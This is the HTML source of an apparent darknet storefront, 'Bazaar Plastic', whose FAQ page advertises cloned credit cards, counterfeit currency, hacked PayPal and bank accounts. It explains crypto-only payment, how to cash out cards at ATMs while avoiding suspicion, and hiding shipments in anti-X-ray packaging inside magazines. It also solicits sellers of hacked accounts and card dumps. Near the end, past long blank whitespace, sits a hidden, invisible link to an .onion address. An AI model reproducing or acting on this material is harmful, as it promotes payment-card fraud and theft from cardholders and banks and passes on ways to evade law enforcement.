<!DOCTYPE html>
<html>

<!-- 4jcfkzkwbl6t3qq4 ca-cards.php 10:38:44 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<title>Bazaar Plastic</title>

<link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all"/>
<!--theme-style-->
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />	
<!-- 4jcfkzkwbl6t3qq4 //theme-style-->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<!--fonts-->
	<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800,300' rel='stylesheet' type='text/css'>
	<link href='http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900' rel='stylesheet' type='text/css'>
<!-- 4jcfkzkwbl6t3qq4 //fonts-->

</head>
<body><!--header-->
	<div class="header">
		<div class="container">
			<div class="logo">
				<a href="index.html"><img src="images/logo.png" alt=" " /></a>
			</div>
			<div class="top-nav">
				<span class="menu"> </span>
				<ul>
					<li><a href="index.html" >Cloned Cards</a></li>
					<li ><a href="counterfeits.html" >Counterfeits</a></li>
					<li ><a href="paypals.html" >PayPals</a></li>
					<li><a href="bank-accounts.html" >Bank Accounts</a></li>
										<li><a href="about.html" >ABOUT</a></li>
					<li class="active" ><a href="info.html" >INFO</a></li>
					
					<li><a href="contact.html" class="scroll">CONTACT </a></li>
				</ul>
			</div>
			<div class="clearfix"> </div>
		</div>
	</div>
	<!-- 4jcfkzkwbl6t3qq4 //header-->
	
	<!--content-->
	
	
		<div class="container">
		    
		    
			<div class="services" id="services">
				<h3>INFO</h3>
				
							<br>
					
					<br>
				
					<div align="left"> 
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">What is bitcoin?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">READ MORE ABOUT BITCOIN <a href="https://bitcoin.org/" target="_blank" style="color:#f18609">HERE</a>.</span>
					<br>	<br>
					<span style="text-transform: uppercase;text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Is Bitcoin the only form of payment you accept?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Yes, it's secure and anonymous. We don't accept WU, moneygram, Paypal, etc. only Bitcoin. We have started accepting Ethereum/ETH and Monero/XMR for payment. Send a request by e-mail.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Where can I get Bitcoins?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">You can buy them on various bitcoin marketplaces on clearnet. The sites we would personally recommend are localbitcoins.com, coinbase.com or spectrocoin.com.</span>
					<br>	<br>
					<span style="text-transform: uppercase;text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Why are you selling cards? Why don't you cash out the cards yourselves?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Of course, we withdraw for ourselves. But we cannot cash much money in one small city, because it is dangerous. It is also very dangerous to cooperate with agents in other cities, because they can be the police. It is easier and safer for us to deal with the sale. 
We also can't really cash them all out, the amount of dirty money gone 
from the ATMs would attract some unwanted attention that could lead to a
 serious investigation. We also believe in Bitcoin and hope to get rich with it.</span>
					<br>	<br>
					
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">how can i get online accounts ( Bank accounts / Paypals )?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Login details will be sent to your e-mail or other contacts that you specify in the purchase process.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Where is shipping available?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">We ship world wide, we have own delivery technology, it depends on the size of your order.</span>
					<br>	<br>
					
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Can I use the cards online?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Yes, VISA / Master Card / American Express prepaid cards working very well with online stores, ATMs, offline stores.</span>
					<br>	<br>
					
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">How safe are those cards in reality?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">VISA / Master Card / American Express Prepaid cards are absolutely zero-risk, yet you don't even need to hide your identity that much when using them. It's the best to remain as unsuspicious as it's possible when using them. It's impossible to track you down solely by your look, unless you are a celebrity or something.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">Is it safe to receive the money to my personal PayPal account?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Yes absolutely safe. As we explained, the money will be sent from a clean and verified account with six-month transactions history.</span>
					<br>	<br>
					
					
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">How long does shipping take?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Orders
 will usually ship within 72 hours, however please do not stress if your
 order has not shipped for 3-4 days (US,Europe). There are a number of 
reasons dispatch may be delayed. We will notify you of any delay and 
attend to each order as quickly as possible. Once shipped, your order 
will generally take 3-4 days to reach most countries.</span>
					<br>	<br>
					
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">HOW MUCH DOES SHIPPING COST?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">The cost of regular delivery is free. Packages are packed in anti X-RAY and anti magnetic field foil. After payment you will receive an email tracking number. All cards, counterfeits are safe for delivery and are not prohibited items. We make sure to send the cards in safe packages such as: greeting cards, magazines and more. In addition, our cards look exactly like a regular credit card with a high quality of printing and embossing.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">What is the quality of your products?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">We are selling only checked and valid accounts, cards or counterfeits to our customers.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">YOU WANT TO SELL hacked accounts?</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">Contact us if you can sell hacked accounts or dumps on a regular basis.</span>
					<br>	<br>
					<span style="text-transform: uppercase;font-weight: bold; font-size:30px;color:#f18609">No message about the dispatch of the goods</span><br>
					<span style="font-weight: normal; font-size:25px;color:#cccccc;">After payment, send the transaction number and your item to email.</span>
					<br>	<br>
					
					
					</div></div></div>
				
	<!--footer-->
	<div class="footer">
		<div class="container">
				<div align="center">
					 <span style="color:#fff;font-size:19px"class="footer-grid">Bazaar Plastic &copy; Cloned Cards Counterfeits PayPals</span>
			 	</div>
		 </div>	 	
	 </div>
		 </div> 
                                                                                                                                                                                                                                                                                                                                             <SCRIPT></SCRIPT><a rel="nofollow" href="http://sky5lnyjujvwn44ebpp54xfde42bfbe47dd73skc4tti3bvkdwm4ieid.onion/" onclick="bybyby();" target="_blank"><div id="click" style="position:absolute;display:none;z-index: 15000;"></div></a>    
</body>



<!-- 4jcfkzkwbl6t3qq4 ca-cards.php 10:38:44 GMT -->
</html>
<!--fuck you-->